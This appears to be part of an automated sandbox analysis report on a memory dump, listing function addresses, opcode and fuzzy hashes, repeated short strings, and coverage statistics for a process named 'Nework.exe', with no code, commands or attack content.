Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f0834de54d5fae6c3662140ad21b63c4c6e3ff70822bffb88b99a4c089cd0ec
Instruction ID: bd6e9231d86e5653c71eecc51fbf99a673f540841932c926b307cd25e0d4ef67
Opcode Fuzzy Hash: 9f0834de54d5fae6c3662140ad21b63c4c6e3ff70822bffb88b99a4c089cd0ec
Instruction Fuzzy Hash: 58F09031900741CFDBA9DA61E6007ABBBB2AF80615F48886ED04646A29D675E549CB40

Function 0648ADF8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dada5ce39e5724b2367c9dbf1b2925724dc6d727402473297f90f830b2dc35b
Instruction ID: 4747c383921804877cbd5ea8e644bfdbe19150b3b0a7bd782d04c684adba8789
Opcode Fuzzy Hash: 8dada5ce39e5724b2367c9dbf1b2925724dc6d727402473297f90f830b2dc35b
Instruction Fuzzy Hash: ABE09231204200ABCB142B5AB889A9EBADEEFCA355B01402DF20FC3642CAA55C0587A5

Function 0648C180 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1ecd384950fa67d8cfc0e61cf1d538ad55d2fb372062122ab6f008979ca032f
Instruction ID: 4f5a6902497d280869d3c3e821acf50ac3cb21ba32facd180e9396d510487733
Opcode Fuzzy Hash: d1ecd384950fa67d8cfc0e61cf1d538ad55d2fb372062122ab6f008979ca032f
Instruction Fuzzy Hash: AAF06D75500B028FD715EF26E408512BBF6FB88301B00862FE84B82A10DB70A90ACF84

Function 0648B500 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 255f666e26eeea487469871d290e251f48d30f683e322416cca44338200c2ec3
Instruction ID: f8617343b8eb03e120edf5ddaaef2f0e19fc1f6a919d643f9c464ae5fd4ed67f
Opcode Fuzzy Hash: 255f666e26eeea487469871d290e251f48d30f683e322416cca44338200c2ec3
Instruction Fuzzy Hash: 78F0F275D01209BFCB41EFB4D9488CDBBB9AB48200F1442A6A945E2240EA305A459B91

Function 0648AC70 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd98ddefef12d864eae1ff35094cc4ec6aacc3c7561bd145626d20af20e63a5
Instruction ID: 07cf5ce3d2dc5f6cd15a233f6905f465d5d2f762258ee9cb85992dc96c8e3b8a
Opcode Fuzzy Hash: 2cd98ddefef12d864eae1ff35094cc4ec6aacc3c7561bd145626d20af20e63a5
Instruction Fuzzy Hash: 14E0DF313181649BCB06633CB80CAEE3F9BDFC1621B06006EF20B87691CE245A0283E6

Function 0648C120 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddeab048556d4d07336ddfd2f7cb28f9431a874adbeff206eb49318d882dac24
Instruction ID: f8bddbad73c09757766324ddf315e2efbd0fb4ddb4d1c3a767a184edd6a46077
Opcode Fuzzy Hash: ddeab048556d4d07336ddfd2f7cb28f9431a874adbeff206eb49318d882dac24
Instruction Fuzzy Hash: 46E0E5302047515FC711B72DE508BAE7BEADF85304F04042EE246C7751CBA5AC0AC791

Function 0648CC38 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4575bd36cdf7ec64d1c7ab3784543b103ac4153060c62603fb8cc4d5bd028616
Instruction ID: fd03a1de8782d8224467864bc87b91912ece2dc2ec144a1f94241134d20e985e
Opcode Fuzzy Hash: 4575bd36cdf7ec64d1c7ab3784543b103ac4153060c62603fb8cc4d5bd028616
Instruction Fuzzy Hash: 66E09A332063408FDB82BB28F844ACA7B69FF82694B004152D0408B71AC73408078BA2

Function 06485698 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae5eaf39dcb5e4af39ca5fa7956eebb8f0e8ef604bd134059268f018ab265853
Instruction ID: 048cdd4142bb7edd6a733bc2fd3ff85cd166aeb76df8821f6487f251e4b11cfc
Opcode Fuzzy Hash: ae5eaf39dcb5e4af39ca5fa7956eebb8f0e8ef604bd134059268f018ab265853
Instruction Fuzzy Hash: 5FE092B210C2119FD3459B20E84889B7BA8EB95220F05896EE484C7241E632D841C7A9

Function 0648CE88 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ca1402bf8d225e94e71348729618caf4766b380f727d3d6076c79f4a3d00a58
Instruction ID: f9bd417e200a8c912c93156cd3ba3ee860ec7c58fe78bc1a0eca3a8173c0cebd
Opcode Fuzzy Hash: 4ca1402bf8d225e94e71348729618caf4766b380f727d3d6076c79f4a3d00a58
Instruction Fuzzy Hash: 3FE0D872405380EFDB42F334B8496993F6DEF02604B010056DC41CB719D7344C45C792

Function 0648E1FF Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e184558b8bf562656bf13b3dbba8f44684c05ba4ee0451f0325c8da4ac82637
Instruction ID: 83c035b8760a4ca864ce4369a8de12a6375ffe7df719a13b071fc3f950ce6b3a
Opcode Fuzzy Hash: 7e184558b8bf562656bf13b3dbba8f44684c05ba4ee0451f0325c8da4ac82637
Instruction Fuzzy Hash: 57E0DF71A49244EFCF01EF68EC0189D7BB6DE82201B2042DBE809E72A1D6304F15C752

Function 0648E8F8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69682263f22368b7883bb84cc3e9fa5d63a8a52313a44eb4f0f148bc9da285
Instruction ID: 9c5bd41fb811aad7b045152051a6d1251fdedc314a135ec1d180087ccf8b5457
Opcode Fuzzy Hash: 0c69682263f22368b7883bb84cc3e9fa5d63a8a52313a44eb4f0f148bc9da285
Instruction Fuzzy Hash: 2AE0127A1143449FCB829B58DC409D53F79BF5A65470540C5F9808F672C721A821DB61

Function 0648AC80 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e17c599110a0f129a3c5fc93edd296c36cccf2a9da1523e4aa5b648a6b0939af
Instruction ID: eebc4d32c01b70c47c49b1d5b74e7458f9df9a3c19d6389fe715f82c42cd233b
Opcode Fuzzy Hash: e17c599110a0f129a3c5fc93edd296c36cccf2a9da1523e4aa5b648a6b0939af
Instruction Fuzzy Hash: ECD05E313141289B8B092769B8189AE7BAFEEC5666702002AF70BC3B50CE695D0687D5

Function 0648B510 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed77793f2bb408918f135f5cdf40156ac95ac5825d02fa57d53712d63a4307af
Instruction ID: b7fb854f3b541e812ed9ded449028f58ba59cc8d305ec864f646ce41981d075a
Opcode Fuzzy Hash: ed77793f2bb408918f135f5cdf40156ac95ac5825d02fa57d53712d63a4307af
Instruction Fuzzy Hash: DCE07575D0020DFFCB40EFA4D9448DDBBB9EB48200F1082A6D905E3200EB305F559B80

Function 0648E280 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac53e5f0d3641307cc16f6b63acb3d7eb8f07eb9090e14811ec0f5a9493af002
Instruction ID: 01ceca3989de6b6d909b3cbef3be686b8fc4b9489499100868cf485594df9f62
Opcode Fuzzy Hash: ac53e5f0d3641307cc16f6b63acb3d7eb8f07eb9090e14811ec0f5a9493af002
Instruction Fuzzy Hash: FBE04F31100312CFCA49FB14FD06B4937A9FB89714F010465D8025F778C7B41A599B86

Function 0648E210 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4edede2bd6ccfe11ad45ab6aa62df4380cca73c7c4a33e0f5562d7d9f67c883e
Instruction ID: f7eac789984ab253f76c3ae5b92dd59cc11e5f99fedd82ebe8bc19e862e2fa6d
Opcode Fuzzy Hash: 4edede2bd6ccfe11ad45ab6aa62df4380cca73c7c4a33e0f5562d7d9f67c883e
Instruction Fuzzy Hash: 15D01772A01208FF8F40EFA8E90195DB7F9EF45204B1045AA9909E7210EB316F009B91

Function 0648F8EA Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ae6eb0f5f1e84d1ce1b5840e3f9edbba371e525385ff6789e4b196243520143
Instruction ID: 865ffde40ac2995ce34a435876d30b3f98a03a0be08ac8cddd12e19ec6008c1c
Opcode Fuzzy Hash: 8ae6eb0f5f1e84d1ce1b5840e3f9edbba371e525385ff6789e4b196243520143
Instruction Fuzzy Hash: A3C01232B042208B0A89B6AC701516C7AD38BC8AA6386002FEA0ED7388DE608D564388

Function 06483721 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ee2fa850dfcf8e0546775497351ae766d70d927c573bbb5cae237d0a216f448
Instruction ID: e79e27e6cf475771eb8095c9aadb8e4ca3e603d1958e867d8043f7117ae8210b
Opcode Fuzzy Hash: 2ee2fa850dfcf8e0546775497351ae766d70d927c573bbb5cae237d0a216f448
Instruction Fuzzy Hash: 83C092322901112BF70861109C0BFE53910E390B10F569225AA06EA2C6CAAEE00AC4BA

Function 0648DFD1 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 467662139f3c73a9e3bf0ff493a0e52cd1ad0e8bc2ad6f1612c1aff6363156ae
Instruction ID: bee2b2822f4bb932ca9ffe1dc002d77c1a55a4f87a5811413e068e1e67328ca5
Opcode Fuzzy Hash: 467662139f3c73a9e3bf0ff493a0e52cd1ad0e8bc2ad6f1612c1aff6363156ae
Instruction Fuzzy Hash: 1DC04C7554B2D06EDF4657648D0D5857E269F5762471500C6A7818A0669A1104458A91

Non-executed Functions

Function 0648E2C7 Relevance: 46.6, Strings: 37, Instructions: 387COMMON

Download Yara Rule

Strings

D}i, xrefs: 0648E40C
D}i, xrefs: 0648E86F
D}i, xrefs: 0648E4A3
D}i, xrefs: 0648E51B
D}i, xrefs: 0648E431
D}i, xrefs: 0648E6D0
D}i, xrefs: 0648E39D
D}i, xrefs: 0648E5BB
D}i, xrefs: 0648E56B
D}i, xrefs: 0648E798
D}i, xrefs: 0648E309
D}i, xrefs: 0648E680
D}i, xrefs: 0648E7EE
D}i, xrefs: 0648E32E
D}i, xrefs: 0648E593
D}i, xrefs: 0648E6A8
D}i, xrefs: 0648E4CB
D}i, xrefs: 0648E3E7
D}i, xrefs: 0648E770
D}i, xrefs: 0648E608
D}i, xrefs: 0648E748
D}i, xrefs: 0648E3C2
D}i, xrefs: 0648E630
D}i, xrefs: 0648E819
D}i, xrefs: 0648E2E4
D}i, xrefs: 0648E456
D}i, xrefs: 0648E543
D}i, xrefs: 0648E7C3
D}i, xrefs: 0648E4F3
D}i, xrefs: 0648E6F8
D}i, xrefs: 0648E5E3
D}i, xrefs: 0648E844
D}i, xrefs: 0648E353
D}i, xrefs: 0648E378
D}i, xrefs: 0648E658
D}i, xrefs: 0648E47B
D}i, xrefs: 0648E720

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-626374656
Opcode ID: b27699e6fbb5a410877e872efff40f9769a17734eb9cf5c95eff2c68ffe4ef93
Instruction ID: cf65d91c92ac859e9151ea36818040783b4fc621e3ace1c3abccb64bc5e8b80e
Opcode Fuzzy Hash: b27699e6fbb5a410877e872efff40f9769a17734eb9cf5c95eff2c68ffe4ef93
Instruction Fuzzy Hash: 6CD1C1313006026BE606AAB8AD53E7CB65ABFC5304B40883CD1198F7A9DF756D1E93D6

Function 0648E2D8 Relevance: 46.6, Strings: 37, Instructions: 383COMMON

Download Yara Rule

Strings

D}i, xrefs: 0648E40C
D}i, xrefs: 0648E86F
D}i, xrefs: 0648E4A3
D}i, xrefs: 0648E51B
D}i, xrefs: 0648E431
D}i, xrefs: 0648E6D0
D}i, xrefs: 0648E39D
D}i, xrefs: 0648E5BB
D}i, xrefs: 0648E56B
D}i, xrefs: 0648E798
D}i, xrefs: 0648E309
D}i, xrefs: 0648E680
D}i, xrefs: 0648E7EE
D}i, xrefs: 0648E32E
D}i, xrefs: 0648E593
D}i, xrefs: 0648E6A8
D}i, xrefs: 0648E4CB
D}i, xrefs: 0648E3E7
D}i, xrefs: 0648E770
D}i, xrefs: 0648E608
D}i, xrefs: 0648E748
D}i, xrefs: 0648E3C2
D}i, xrefs: 0648E630
D}i, xrefs: 0648E819
D}i, xrefs: 0648E2E4
D}i, xrefs: 0648E456
D}i, xrefs: 0648E543
D}i, xrefs: 0648E7C3
D}i, xrefs: 0648E4F3
D}i, xrefs: 0648E6F8
D}i, xrefs: 0648E5E3
D}i, xrefs: 0648E844
D}i, xrefs: 0648E353
D}i, xrefs: 0648E378
D}i, xrefs: 0648E658
D}i, xrefs: 0648E47B
D}i, xrefs: 0648E720

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-626374656
Opcode ID: de31d72c7d202dbbe57155a493e2596726b8966b8dae74e572b4442ef2ecfc75
Instruction ID: bffc7a9ecab61411091b717c9df074c3963970e7f8dccd40fab92878a149f369
Opcode Fuzzy Hash: de31d72c7d202dbbe57155a493e2596726b8966b8dae74e572b4442ef2ecfc75
Instruction Fuzzy Hash: EED1C0313006026BE606AAB8AD53E7CB55BBFC5300B40883CD1198F3A9DF756D0E93D6

Function 0648CC7F Relevance: 16.4, Strings: 13, Instructions: 151COMMON

Download Yara Rule

Strings

D}i, xrefs: 0648CDE9
D}i, xrefs: 0648CD7A
D}i, xrefs: 0648CC9C
D}i, xrefs: 0648CE33
D}i, xrefs: 0648CD0B
D}i, xrefs: 0648CE0E
D}i, xrefs: 0648CCC1
D}i, xrefs: 0648CCE6
D}i, xrefs: 0648CE58
D}i, xrefs: 0648CD9F
D}i, xrefs: 0648CD30
D}i, xrefs: 0648CDC4
D}i, xrefs: 0648CD55

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-1209774835
Opcode ID: 263644d519f1e080ed9007e1603d1ea8fbe5cd7f9b17e3bc7517892407fb8216
Instruction ID: 53850fa9aff662e58cca90a53dc2857090d8b58beb8013630c5844414a4f98c9
Opcode Fuzzy Hash: 263644d519f1e080ed9007e1603d1ea8fbe5cd7f9b17e3bc7517892407fb8216
Instruction Fuzzy Hash: 4141C8313006022BE606A6B4AD43E3DB65AFFC5304B40493CD2198F7AADF756D0A83DB

Function 0648CC90 Relevance: 16.4, Strings: 13, Instructions: 143COMMON

Download Yara Rule

Strings

D}i, xrefs: 0648CDE9
D}i, xrefs: 0648CD7A
D}i, xrefs: 0648CC9C
D}i, xrefs: 0648CE33
D}i, xrefs: 0648CD0B
D}i, xrefs: 0648CE0E
D}i, xrefs: 0648CCC1
D}i, xrefs: 0648CCE6
D}i, xrefs: 0648CE58
D}i, xrefs: 0648CD9F
D}i, xrefs: 0648CD30
D}i, xrefs: 0648CDC4
D}i, xrefs: 0648CD55

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-1209774835
Opcode ID: 155dad80ab58625612892867bf0d5721ee96252f2b78ed6aa303246a7914bf4b
Instruction ID: d6d1e64cbdab9c78a92800c82d0c61e3fd6a78f6cf0f96923cab5d28d5895797
Opcode Fuzzy Hash: 155dad80ab58625612892867bf0d5721ee96252f2b78ed6aa303246a7914bf4b
Instruction Fuzzy Hash: BA41A6313406022BE606A6B4AD43E3DB65AFFC5304B40893CD2198F7A9CF796D0A43DA

Function 0648CED1 Relevance: 10.1, Strings: 8, Instructions: 104COMMON

Download Yara Rule

Strings

D}i, xrefs: 0648CF11
D}i, xrefs: 0648CFEF
D}i, xrefs: 0648CF5B
D}i, xrefs: 0648CEEC
D}i, xrefs: 0648CF36
D}i, xrefs: 0648CFCA
D}i, xrefs: 0648CFA5
D}i, xrefs: 0648CF80

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-1477724378
Opcode ID: 58730e1d4a4a74f7c1585106f13def4e052844b6c1e4415f868287b9a4b9bfb7
Instruction ID: c56f77b8bf71c625b522c1d122406c6f846b598113b7912c8f13296209d6196a
Opcode Fuzzy Hash: 58730e1d4a4a74f7c1585106f13def4e052844b6c1e4415f868287b9a4b9bfb7
Instruction Fuzzy Hash: CF31BC313002022BE706A6749D42E7DBA5AFFC5704B40493CE1198F79ADF756D4A83D7

Function 0648CEE0 Relevance: 10.1, Strings: 8, Instructions: 93COMMON

Download Yara Rule

Strings

D}i, xrefs: 0648CF11
D}i, xrefs: 0648CFEF
D}i, xrefs: 0648CF5B
D}i, xrefs: 0648CEEC
D}i, xrefs: 0648CF36
D}i, xrefs: 0648CFCA
D}i, xrefs: 0648CFA5
D}i, xrefs: 0648CF80

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-1477724378
Opcode ID: 29ef5944ed8fc805fa38cb506a5dd695f93a3dae0660ec8f1eeb3b1ab9531f93
Instruction ID: bd964aafcc7df39476a3c8be732812659e79feea454f64d5eb4eace117dd8422
Opcode Fuzzy Hash: 29ef5944ed8fc805fa38cb506a5dd695f93a3dae0660ec8f1eeb3b1ab9531f93
Instruction Fuzzy Hash: BD2188313002026BE606A6A4AD42E3DB55AFFC5704B40893CE2198F7A9CF756D4A93DA

Function 0648C968 Relevance: 8.8, Strings: 7, Instructions: 88COMMON

Download Yara Rule

Strings

D}i, xrefs: 0648C9AD
D}i, xrefs: 0648CA7A
D}i, xrefs: 0648C984
D}i, xrefs: 0648CA51
D}i, xrefs: 0648C9D6
D}i, xrefs: 0648CA28
D}i, xrefs: 0648C9FF

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-3632686342
Opcode ID: a47189b2c3e206b28c26ff8950f7361d9d4501c09dfdac67cace5e0f7e78ae21
Instruction ID: 0fe20f059e09f179f4f5ae104fefdec38cc87b904f7ffb43c70cb2071cab284b
Opcode Fuzzy Hash: a47189b2c3e206b28c26ff8950f7361d9d4501c09dfdac67cace5e0f7e78ae21
Instruction Fuzzy Hash: E831A2313002876BEB062BA0AD5697D7B26FFC63047404538E51A8FAA9CE745E4FC792

Function 0648C978 Relevance: 8.8, Strings: 7, Instructions: 83COMMON

Download Yara Rule

Strings

D}i, xrefs: 0648C9AD
D}i, xrefs: 0648CA7A
D}i, xrefs: 0648C984
D}i, xrefs: 0648CA51
D}i, xrefs: 0648C9D6
D}i, xrefs: 0648CA28
D}i, xrefs: 0648C9FF

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-3632686342
Opcode ID: 16ac80c622fe198ba9def861b498b9077e9e9263795ac91a6681ad557fcd0597
Instruction ID: 269f30bd3d515789d633a9da8195449b2a8d109356e7f598e8bdaa2801cd01b7
Opcode Fuzzy Hash: 16ac80c622fe198ba9def861b498b9077e9e9263795ac91a6681ad557fcd0597
Instruction Fuzzy Hash: 262182313002476BEB062BA4ED4687DBB5AFF853007404438E11A8F7A9CE755E4F8BD2

Function 0648D538 Relevance: 7.6, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

D}i, xrefs: 0648D554
D}i, xrefs: 0648D60D
D}i, xrefs: 0648D5E8
D}i, xrefs: 0648D5C3
D}i, xrefs: 0648D579
D}i, xrefs: 0648D59E

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-3147682437
Opcode ID: 70de3281258c462b8bcc8c03833ee62636b744c5c128c99bfcd382bad5b1b5c3
Instruction ID: 9dcb74681b1c2cb0fb8dd8b12443d6a55f3bef56678e20320d8321d6ba2d1285
Opcode Fuzzy Hash: 70de3281258c462b8bcc8c03833ee62636b744c5c128c99bfcd382bad5b1b5c3
Instruction Fuzzy Hash: 1621D8313002022BE60666A4AD52E7DBA5AFF85704B40453CD1098F799CF765D0E83E7

Function 0648D548 Relevance: 7.6, Strings: 6, Instructions: 73COMMON

Download Yara Rule

Strings

D}i, xrefs: 0648D554
D}i, xrefs: 0648D60D
D}i, xrefs: 0648D5E8
D}i, xrefs: 0648D5C3
D}i, xrefs: 0648D579
D}i, xrefs: 0648D59E

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-3147682437
Opcode ID: 7681850df71f1a6ee96ed454f239a0b5ff0e693fd665c7fb96f3abe569530bc0
Instruction ID: 4680870163cff572fa9d2969336a4b91f67ebb496bbd4eb5f32d4b9705478ef6
Opcode Fuzzy Hash: 7681850df71f1a6ee96ed454f239a0b5ff0e693fd665c7fb96f3abe569530bc0
Instruction Fuzzy Hash: 9611C6313002022BE60666A5AD42E3DB65BFFC5704F40893CE1198F799CF766D5E83E6

Function 0648ED10 Relevance: 5.2, Strings: 4, Instructions: 241COMMON

Download Yara Rule

Strings

(_]q, xrefs: 0648ED7A
(_]q, xrefs: 0648EDF9
(_]q, xrefs: 0648EEFA
(_]q, xrefs: 0648EF79

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: (_]q$(_]q$(_]q$(_]q
API String ID: 0-2651352888
Opcode ID: f24e56eb3f50fb4214132c0d17a2c62852da6f9891b05408d90f0e535ae360fd
Instruction ID: d9f5c6fe5729a723c54f729eebe574fa20d033fb43065eec2019b47eb4cdff53
Opcode Fuzzy Hash: f24e56eb3f50fb4214132c0d17a2c62852da6f9891b05408d90f0e535ae360fd
Instruction Fuzzy Hash: A191AD35B043059FDB05AF68D4546AE7BB2EF85300F2485AAED06DB381DB35DE06CB91

Analysis Process: Nework.exePID: 4524, Parent PID: 5632COMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.6%
Total number of Nodes:	565
Total number of Limit Nodes:	15

Executed Functions

